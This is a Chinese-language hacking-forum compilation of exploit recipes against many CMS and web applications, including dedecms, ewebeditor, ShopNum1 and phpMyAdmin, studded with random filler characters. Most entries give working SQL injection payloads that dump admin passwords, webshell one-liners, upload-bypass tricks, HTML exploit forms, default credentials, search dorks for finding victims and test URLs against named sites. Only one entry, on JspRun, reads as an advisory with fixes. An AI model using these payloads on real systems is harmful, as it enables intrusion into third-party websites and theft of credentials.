启航企业建站系统 cookie注入漏洞通杀所有版本4 }6 d" B! t7 [3 i
& M' w n B3 G. u
直接上exploit:
/ {' k! w% v P6 Jjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));9 H: X4 A# P! ?: @* v, ]
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
9 C! M% [+ [: C0 Y0 \1 Y$ Y# s--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: R) K$ y- `- j9 |5 [# T x9 {
Asprain论坛 注册用户 上传图片就可拿到webshell
1 b. c6 q" Q: b4 ~( K
) c( K" U9 X% i* {4 W, xAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
/ Y. |+ w4 |8 C1 ~" Y- X; E7 n1.txt存放你的一句话马 如:<%execute(request("cmd"))%>) a {3 U3 F; F+ O! i) v( m% g
2.gif 为一小图片文件,一定要小,比如qq表情图片
* w Y" I) N5 H- U4 c. f3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
* ^/ B& {9 D9 I! ]+ @# |6 i4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
( @- c' Y7 d- |' [' E5.q.asp;.gif; ^9 I0 L; r6 B0 C2 S. P# M
google:Powered by Asprain
2 o9 X; N0 s5 u+ v% F* E--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ |% D g8 \5 |3 u
$ F3 x. P$ G9 H9 }/ ^3 }; _
ShopNum1全部系统存在上传漏洞。 e$ a( ` x( h% j% w
; s( ~% Y. G/ K; k
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。2 g8 f# N* K; Z
按说明 提示登录后台。。. v( I" S* {" ?( c& Z3 r! Z2 f
在后台功能页面->附件管理->附件列表7 z3 T u! Q# [* r8 ~2 P$ c6 i! k
可以直接上传.aspx 后缀木马1 P# h! Z5 j3 K7 F- m+ A
http://demo.shopnum1.com/upload/20110720083822500.aspx9 ?7 T2 k" U6 c) |9 g3 k( X% t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" N0 x0 \9 l) ^3 p5 s* f- P9 z* x/ a, {. K2 p
牛牛CMS中小企业网站管理系统 上传漏洞9 E5 b3 A, l9 E0 a1 l+ g1 \3 S, y
- g) U# G2 ~2 ?5 F. j
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
) b8 X3 K w: U N2 W后台:admin/login.asp
7 Q) U3 b# V d4 u$ `: }: B/ j; u( T; zewebeditor 5.5 Nday- E9 {+ B. C) I b
exp:" J, a0 a: n% C$ E4 ]
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
# I+ K- g2 v* J R' G, T<input?type=file?name=uploadfile?size=100><br><br>?" @# x8 U; A ^. a2 f1 e
<input?type=submit?value=upload>?
! W+ y9 N, j+ J* [: V</form>9 p# t; b7 e4 e: v0 K7 |
ps:先上传小马.3 \3 [2 X4 e% a
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏4 g8 q6 k% c( U; A1 ?! G
3 ^, q; t! y- k7 E- D u
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" |; s. _0 u+ B, M e. @+ T2 q# N: A: Z
YothCMS 遍历目录漏洞
( I+ F2 _ r m0 q9 e; p
- _$ X& h/ f- A* z7 c O+ _8 e" ?8 W优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。 O! X R0 l g$ ]
默认后台:admin/login.asp
3 \- m' k# Z- P/ C, A) M1 {/ s8 J" ^' R遍历目录:' _7 c4 b. g9 M& A
ewebeditor/manage/upload.asp?id=1&dir=../: v) Y; S5 J* F- z% R" N7 |: v+ @
data:& `! ~9 Z4 ~# t7 ?, l' v* L' `; F: G
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa( H4 b l! j x: J; |- R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 P+ ^6 s, x- \& h0 ^
R" u8 I2 q+ x7 s
Net112企业建站系统 1.02 i* i, ?. ]6 L, p. \1 a
, C; Z( K; }$ Q0 `. q8 z源码简介:/ k! I* D" M5 e
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。7 U! ^3 L, `7 l# M7 @) m) E
添加管理员:! _" S" k. ~. b/ {( @7 e! J1 Z
http://www.0855.tv/admin/admin.asp?action=add&level=2
+ |" Z# t* A3 S1 g其实加不加都不是很重要,后台文件都没怎么作验证。0 r7 V" }5 M; p; c) [0 Z
上传路径:$ ]! q, Y, e. {- }2 E/ p# q/ y" Y
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2002 X9 H* W1 W4 O1 O8 ^
http://www.0855.tv/inc/Upfile.asp?Stype=2
4 p* E/ D b: H3 g/ w怎么利用自己研究。
1 q' [1 _. e8 y3 ~2 R遍历目录:9 l2 X* q5 T* y6 j! f; }. S7 ?
http://www.0855.tv/admin/upfile.asp?path=../..
9 j8 s( L$ j3 s# f+ j如: I( U+ P @9 O( X! ~+ G8 J! v; ~% b
http://www.0855.tv/admin/upfile.asp?path=../admin
2 L) Y H& a& w2 u) i4 N/ ehttp://www.0855.tv/admin/upfile.asp?path=../data; ]" D& q. o5 R+ A. O
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. e3 \/ `; t# C$ O; f; {
7 ^( g/ L$ T7 C- ]易和阳光购物商城通杀 上传漏洞
, s" M2 P( U' v( n1 e4 W, o0 n* t8 c% j( z
前提要求是IIS6.0+asp坏境。
6 ?. E7 y1 S* j9 H7 P7 L8 B漏洞文件Iheeo_upfile.asp ! G% K( _( c, g- d3 a' U+ k Q
过滤不严.直接可以iis6.0上传
$ H, |2 q. `2 r5 e/ m& k把ASP木马改成0855.asp;1.gif8 N8 F- E2 S/ c+ K% E* E9 w
直接放到明小子上传
1 h) f0 W4 y' B8 q7 b( HGoogle搜索:inurl:product.asp?Iheeoid=
1 \8 c' J: t) z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! |8 D7 W3 l! [% [7 O- I" g: U7 w
phpmyadmin后台4种拿shell方法. |( e& z) `1 h
, V) v' c4 e# ^; p. S U% c% X方法一:
4 `0 r8 Q$ ]* r9 h7 V( _; m: Q7 [CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );8 C6 n6 m" D- t O' o: b: h
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
8 o- C: m* z# i \3 ISELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
3 l7 E$ j5 e& I$ k----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php8 |: O/ N0 T' C6 D/ O9 g9 [- r) W
一句话连接密码:xiaoma
8 K8 X2 z% G9 k7 i4 ?方法二:
' d4 q6 {1 S+ T1 h. C( X* _Create TABLE xiaoma (xiaoma1 text NOT NULL);
. c" W" r, W$ T4 ^: X3 P+ RInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
: X. L& M% n1 h8 h) K, L0 wselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
. j+ C3 w( a9 m6 QDrop TABLE IF EXISTS xiaoma;, ]/ b+ T3 f: ~
方法三:
" D7 b3 ] F6 n读取文件内容: select load_file('E:/xamp/www/s.php');6 p( ]- f B' r. l
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'1 j) x+ w% K% w2 f
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
2 Z' N, c# K+ t) T/ h" o# A Z方法四:
) {! F8 F4 N/ U1 Vselect load_file('E:/xamp/www/xiaoma.php');
/ w. q4 L7 P1 s7 A8 b% l$ C& a& rselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
/ B) T, _7 x& Z) C; M2 L6 x. e1 u5 u然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
- v6 m6 r( r6 V-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- q' @! ]9 e0 g( h. r7 m
" E1 Z6 |* X5 J
传信网络独立开发网站源码0day漏洞
2 _3 `- G! f/ [: Q0 j3 \% `
; F+ ] \0 d' D! R" M后台system/login.asp. |1 L! F b0 K7 |& e1 b
进了后台有个ewebeditor9 n) V. }) Y$ o, Z
Google 搜索inurl:product1.asp?tyc=
, h1 ~2 A7 Z0 P9 s6 }0 q编辑器漏洞默认后台ubbcode/admin_login.asp
( e' R! f0 u m# n1 ? B3 y数据库ubbcode/db/ewebeditor.mdb2 x6 X% S/ s1 c8 E4 T% Q: r
默认账号密码yzm 111111! R6 a! Z& Y' u: b. H: `( J$ k
1 j' [" y( V7 W; u
拿webshell方法5 f" c* e. l2 t4 l6 @2 Q
登陆后台点击“样式管理”-选择新增样式 5 B) {0 Q" k0 f$ U& j3 U
样式名称:scriptkiddies 随便写
# t0 J3 S1 t- u. f5 I% z路径模式:选择绝对路径 $ D( G( o/ E1 e$ l. h
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx$ W r, W. V0 d& r
图片类型比如就是我们要上传的ASP木马格式3 Y; |5 u; `" L
上传路径:/
@ L% b- X2 {3 p" F$ K; O图片限制:写上1000 免的上不了我们的asp木马! A" ~( b( ?8 M2 }9 n
上传内容不要写
9 E" F+ F, H6 e F* p+ D$ b可以提交了 7 c' p9 w3 `# s2 b0 B* u2 x
样式增加成功!
- K; h3 n9 ?4 w2 w h返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
, R) \; R2 B* X6 c按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
) A1 D5 ~* S% {5 g+ q# C5 k! d网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies' m5 s+ j# b- a; q3 F! l3 @
上ASP木马 回车 等到路径# R O' ~' L$ T1 s( f8 l
8 \ F/ x; W3 \, s9 O3 j
后台:system/login.asp. J1 F3 @1 Y) X! z( V1 ?* G% o
Exp:* n% d; `- t: x3 B% s* [
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master( s8 `$ c: d( y/ |5 _1 a, {. z: v
测试:* ^: @1 i$ p8 Z2 ^/ r) y$ @& ?
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
6 U( v. f: F* w# M* D3 nhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master7 P' e# c/ ]/ X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- F( ]/ ^8 N6 G: |6 r
0 Q& O& V" z) s& u" s% `& _foosun 0day 最新注入漏洞
1 X/ @! v0 L- M u
9 G9 J6 U3 b0 g, Q漏洞文件:www.xxx.com/user/SetNextOptions.asp
+ u4 \6 i% B+ w4 s% s2 k. F利用简单的方法:
. p2 o9 C. j! ^2 b( K暴管理员帐号:
# q1 Q, L9 w* n5 z% \% L6 N- |& m/ Mhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin3 n' G7 m: H7 ~) Z- Z3 z
暴管理员密码:! I H# j8 |9 Y/ ]8 R
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,) F' Z! ?# o8 b5 O0 h
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' L P# l4 F4 A! S, q$ D. c. O: Z, j5 C; ? Z) @4 m6 h: N, c
网站程序的版权未知!3 @' H8 d+ j# j- u
m5 a) d& H0 a; L9 U' |9 b
默认网站数据库:" p* J- j1 b" j \
www.i0day.com/data/nxnews.mdb
% C: R' V8 [6 B- s4 w+ o" A6 Uewebeditor 在线编辑器:; ]: H r9 ~5 a5 W7 d
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
" `1 P* V. \% h1 @/ @7 x2 T( K登录地址:ewebeditor/admin_login.asp6 e; m& @5 q! m
默认密码:admin admin
9 K; K* T$ W9 N7 ~; A, r登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
7 w8 I5 ]4 y; X2 C' H3 g0 u+ b
, U- y5 w. R3 n( CSql注入漏洞:
& h8 n% x' L0 e& N, M2 T7 E( z! D0 `" Uhttp://www.i0day.com/detail.asp?id=12
: {9 ^) N( b" H: S+ ~% Jexp:" L' U9 R+ J, M; W. r
union select 1,admin,password,4,5,6,7,8 from admin5 S+ v& k6 F" v6 p1 e; w# u) I) ]0 U
爆出明文帐号/密码
. V* h% k8 H# D5 Z ^% ^9 t7 }4 D8 a+ [$ u
上传漏洞:
4 \9 n: V& o! C" J1 d/ M后台+upfile.asp$ P; b, ?3 x3 R5 \
如:7 g6 a) [; p2 p V6 ^* E4 Q
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
, f6 V8 E: W4 A$ z+ ^shell的地址:网址+后台+成功上传的马
) i( V" i) w8 O# G8 c3 ngoogle:inurl:news.asp?lanmuName=( ~+ X9 Y7 o: D+ D/ G, i5 g
------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 W5 j; e/ p; f# }* u3 ]/ T
$ R" l7 ?- B9 P' |) j
dedecms最新0day利用不进后台直接拿WEBSHELL
( S7 u ~1 }3 N: Q9 T! G1 L6 T( \
拿webshell的方法如下:
9 X' T; l1 l C" R0 Q$ x9 {网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.5 a1 b# ^* z( S4 \) `0 p
前题条件,必须准备好自己的dede数据库,然后插入数据:
- I+ e# r/ Y! m5 k1 q3 Minsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 8 S# ] S9 d( S8 _5 k
7 R3 j9 I4 @" J% o3 i7 ^2 S/ K+ H
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 r& M5 n5 D5 h% n6 }" y$ k! y
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
5 f I1 b% G2 {5 i) u8 G3 l, i<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />$ }) T7 Y, n0 r( s
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
! y$ U4 N$ w- j8 [6 n- j<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
8 [7 g$ W _# o; i- {' |<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
' z' n; q1 y/ l. J# f3 u3 @<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
" T& Z' N/ W( X9 j3 p<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
' f+ h6 M+ n J# c# y8 t6 j<input type="text" value="true" name="nocache" style="width:400">
: S# {9 C7 r# _9 S: X<input type="submit" value="提交" name="QuickSearchBtn"><br />8 \' J1 w% H2 l( }. f+ g
</form>; E) o( P; `* q' Y: k, v0 y& Q
<script>' I/ r6 s0 A0 J
function addaction()
5 V2 H) P$ o" L& L{) C0 _. n9 C: E( v
document.QuickSearch.action=document.QuickSearch.doaction.value;
; p" k5 @) w% o5 _- x! k1 k}) z0 g. x! a9 P' t( _7 ]9 q9 `
</script>
: d" f! r' l+ ^-----------------------------------------------------------------------------------------------------------------------------------------------
% g( _ P; d' I1 P/ G" H1 G( E. L, V) X9 z
dedecms织梦暴最新严重0day漏洞
5 C" X( G4 x; [bug被利用步骤如下:
1 y9 A/ h1 z8 W; a4 l5 O4 P7 \http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root/ w* O( L+ [& y8 ~2 ~
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
7 Z) J- G9 |, m5 X-------------------------------------------------------------------------------------------------------------------------------------------, [+ }' U# Q% K; c& }) j2 C7 w7 D' @
5 b3 j, t( E6 p) d* y# }4 `多多淘宝客程序上传漏洞
! ^% q8 }- V. X" m0 @' o+ A漏洞页面:
- t, d/ z/ H' ] e/ x% Cadmin\upload_pic.php
" @( F5 i5 D7 M( E- @. g传送门:9 M# F( @& `# t2 w
http://www.www.com/admin/upload_pic.php?uploadtext=slide1- ?- p3 S/ |4 M6 C" I U
PS:copy张图片马 直接 xxx.php 上传抓包地址!
: ?1 P1 x+ s6 a------------------------------------------------------------------------------------------------------------------------------------------------------$ A# |& n! P8 Y
) Y8 a( }5 ?5 S8 Y1 U* Q7 G* s: D ]5 H无忧公司系统ASP专业版后台上传漏洞
" Y' R" r( i1 u Z+ k5 y# Q漏洞文件 后台上传4 \' e! I6 z3 }! t$ s
admin/uploadPic.asp7 `& m! x& p8 U9 N* {7 v
漏洞利用 这个漏洞好像是雷池的
4 K+ E" R3 R$ j: Q! m1 Vhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
( X6 h+ N" Q! ~4 Q等到的webshell路径:
x* ^) W& @- A2 g j+ ]/UploadFiles/scriptkiddies.asp;_2.gif
8 w& F" N( a+ Y2 e$ c2 B---------------------------------------------------------------------------------------------------------------------------------------------------& k2 i) t' t6 Y/ Z. O
+ |: K0 Q3 M' S2 U2 }# J
住哪酒店分销联盟系统20109 K8 L% |/ L: D/ x
Search:
- a% \& t; Q* @8 C& uinurl:index.php?m=hotelinfo& M y u* |0 D! H7 N6 x, r
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
4 R1 ?0 ^( b! d$ k默认后台:index.php?m=admin/login+ a1 e/ G& K2 H l
--------------------------------------------------------------------------------------------------------------------------------------------------. Q9 i; `# H5 G9 J6 Z9 A0 X% S2 i
* ]% k z* a) ^) T2 Y. K9 t* m
inurl:info_Print.asp?ArticleID=
# B; u6 j( Y% W- O9 D: U3 D; t( }后台 ad_login.asp7 c# {5 O9 }8 U* Y0 m$ a: v1 {; ?8 v
爆管理员密码:
- E$ |1 w" m, l+ _! ]union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
& J* Y) W. i+ M4 N; }------------------------------------------------------------------------------------------------------------------------------------------------------------
) \+ Q1 P+ i8 d. Y' K( t: }! n; C! J6 L. h" m" M
搜索框漏洞!6 ^6 Q. r" q0 {6 Q/ Z* u. E
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='# z+ J4 W* p' i2 I+ ~3 ?, X( l0 Z
--------------------------------------------------------------------------------------------------------------------------------------------------------' H% u# h7 o) z1 U* v* E
T6 Y, D+ h4 V+ \关键字:0 i9 A! {. D4 V
inurl:/reg_TemletSel.asp?step=2: j [- ^" F) G* V; i$ a8 a
或者6 u" }8 F. b/ W+ z1 E& c3 b
电子商务自助建站--您理想的助手" F* s5 Q, b: g
-------------------------------------------------------------------------------------------------------------------------------------------------2 x( ~6 L0 D. ~
% Y9 X' B- s7 o0 G/ D& giGiveTest 2.1.0注入漏洞- l/ W7 a% y( o& T6 H* T+ x
Version: <= 2.1.0
5 v2 ] o! g' P* J# Homepage: http://iGiveTest.com/
+ }* i2 C" l/ k6 Q3 Y/ c谷歌关键字: “Powered by iGiveTest”
1 t; p, R+ {/ S5 Q7 l6 i, ]8 z5 C随便注册一个帐号。然后暴管理员帐号和密码
, h. R5 ?- E+ P5 Ehttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1 \9 O0 R0 [( q
------------------------------------------------------------------------------------------------------------------------------------------------! a& |( O, y% \3 m5 u
0 Z" r/ v6 J4 V8 _# _CKXP网上书店注入漏洞
. X; d7 s; `0 b, ~8 j5 Q工具加表:shop_admin 加字段:admin
* M m. I' m/ A* e: p* T后台:admin/login.asp 9 T- J% q* F+ E' m7 @2 j4 G
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
- X' c- i% k' N5 v binurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息. \/ M8 G: G" H p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ D1 g& c0 K- X3 M! v# ]; }/ H( F2 x' ~+ U) O( E
段富超个人网站系统留言本写马漏洞
& ~9 l) i: |3 m& B源码下载:http://www.mycodes.net/24/2149.htm- a& r) e ?& B5 F/ T2 v- g
addgbook.asp 提交一句话。
: C. Z2 G) }0 w4 p, u连接: http://www.xxxx.tv/date/date3f.asp
4 L- D& y1 B% Kgoogle:为防批量,特略!' K& [4 ?: M3 s% W$ H
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ K, h! q) D; _, P* I! Q/ Q! S Q/ l4 w& w! H- ~4 ~/ ?9 M% u5 A
智有道专业旅游系统v1.0 注入及列目录漏洞
8 T0 f' U& p: |' x4 N默认后台路径:/admin/login.asp
9 e& ~ ^- M' [3 \- U默认管理员:admin
1 L4 m2 C7 o2 c# U9 v3 M3 A默认密码:123456
6 M0 \# K$ J7 M4 ?6 A) ?SQL EXP Tset:
4 P1 [' H+ g2 z, fhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
/ P& t+ j# P a% m------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 Q, H. o, H3 a# L9 O5 v
3 v7 {+ m# K4 y! S) d% e+ j
ewebeditor(PHP) Ver 3.8 本任意文件上传0day, F- }0 H. C# x9 B) q% k
EXP:3 c% _, }, b0 j8 j: t5 m6 b
<title>eWebeditoR3.8 for php任意文件上EXP</title>, n2 K' k9 \0 Z" I0 @3 S
<form action="" method=post enctype="multip
, D+ M7 Y1 V& m: F- H7 C( ^art/form-data">
' h' {4 t; Z9 Z8 T<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 7 K% a8 W1 _; N& I+ D0 y$ P
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> : ^. W* q3 [1 i" f+ f
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> : x' m; r7 P$ x) d1 Q/ f: J w: F
file:<input type=file name="uploadfile"><br>
g* g: w# |' E; F5 e<input type=button value=submit onclick=fsubmit()> , L8 C* F: w& l. X# v4 c) |2 q3 ^
</form><br> ! D5 o! R! [9 C
<script> ! _- n* k, ^+ r) E
function fsubmit(){
4 }$ b# T# f) Aform = document.forms[0]; . J7 k$ @; O. c2 f- Z6 r) D
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
2 r) I G ~+ c2 n' G! ?5 g Zalert(form.action); ) o) u$ P' N+ |! s" b3 v4 \7 |2 M
form.submit();
3 S* u8 q' A2 _}
# ?. E/ G; s8 |( ?: `2 }$ b3 l9 X</script># c8 m l2 J- C; [3 y0 _; t6 K6 G
注意修改里面ewebeditor的名称还有路径。
* c7 a4 S9 ^5 O* C- ^1 s' G( A---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ J' M8 O+ e! i4 t8 s9 L- m
) v! ?+ K/ P( {( P& n* L4 h) N提交’时提示ip被记录 防注入系统的利用
# Z3 R; M6 ^8 z6 ?6 C网址:http://www.xxx.com/newslist.asp?id=122′
8 q0 N, @1 t1 L) d) u! k提示“你的操作已被记录!”等信息。1 C9 Z! ]: k1 k
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
! T! m8 S. c' F; I! S-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 z4 ^$ q" [7 {! X9 c6 |2 }+ `% q/ i" g% x& B @) y. w
西部商务网站管理系统 批量拿shell-0day$ m" Q7 s, {1 b4 P
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb , Z2 d) q' i; V. W: g" _: ~
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
" W% A) v# W7 M5 n( `2 n& b: p: r2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合3 I: j1 @7 V+ q j) \8 C( f K
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
/ R$ n( u' w) h6 Q: G6 P. r. i5 Z$ W8 v---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ W# c0 q" ^: ]1 h; B n7 |: e9 O
JspRun!6.0 论坛管理后台注入漏洞
& j, F% c8 h$ j) ?5 d, q3 w8 [2 j7 }3 o, J3 z8 [- E+ r
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:. e3 W3 M/ K* M1 o$ X! f8 {2 J
JspRun!6.0
7 j$ [" K( e, H$ ]% n漏洞描述:2 u2 B- E8 X) Y1 @
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。0 T! d. f5 G# G
在处理后台提交的文件中ForumManageAction.java第1940行
4 t3 I' n5 p2 ?0 o3 e6 hString export = request.getParameter("export");//直接获取,没有安全过滤& ~" v1 G- L6 \- C" i. ^
if(export!=null){# G3 w1 H a3 p- t4 |& |
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...: z. a: {8 L Z) C1 P2 ?. Y. v3 L! \
if(styles==null||styles.size()==0){
6 E' d* v( |; q# S<*参考
# O# h" Z: `4 L" rnuanfan@gmail.com6 k/ G3 B$ @& O7 U
*> SEBUG安全建议:8 \$ S5 b4 n% s0 _- y" c
www.jsprun.net, o7 T% h$ A' u4 l |6 n3 ?) e" L
(1)安全过滤变量export
0 Z' { B: |8 L. T$ r(2)在查询语句中使用占位符) C: [3 |. m K1 m/ o9 I+ Z e
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 @7 }% T, P! U4 B& m- I
; k0 E: w9 ], d$ k! n乌邦图企业网站系统 cookies 注入
* |" P1 v% C' q/ d- B2 o: g2 @8 _' v( g% |
程序完整登陆后台:/admin/login.asp
$ N; h( G0 w$ x6 E% i4 L* J) \' Y默认登陆帐号:admin 密码:admin888
! C: {- s% h T$ `+ Z! z7 y* N语句:(前面加个空格)/ |) d7 N3 }, ^' L( A7 ^4 m
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin( ]# w3 H4 J% ^
或者是16个字段:* D3 z! {/ T: p& i2 l+ s+ D% U% _7 Q
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
8 `6 Z0 J) c* g爆不出来自己猜字段。
; Q+ @) ` U1 y注入点:http://www.untnt.com/shownews.asp?=885 v. g4 C5 I" `- e9 f( |5 m) m0 l8 Y
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
2 c* Y& F- m0 {) L1 F) H! x关键字:1 }" O6 o6 m. J
inurl:shownews?asp.id=
- D3 Q1 u/ I3 x9 ?8 @-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ s# m4 g" S C% a% v, _2 z/ B
" p. u: v; u5 _. _$ MCKXP网上书店注入漏洞
# {# ~! ^1 A& Y9 V% ^9 N+ a, F
6 K, L2 |1 X* E工具加表:shop_admin 加字段:admin
9 Q+ u( c; k4 @& N后台:admin/login.asp
" t+ M" N0 \# f9 }$ s9 M, g登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/( l% L& @/ k! f) k1 X1 }- g, I7 h2 k
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
1 n! R: D" W0 \+ g: W+ ^---------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 ~4 s# I' y% k6 D
+ _7 o: I7 v0 Z+ Z3 wYxShop易想购物商城4.7.1版本任意文件上传漏洞/ B/ M7 m e, I2 \% [$ [6 _* Q! E3 _
) y* c$ K% S2 x' Q
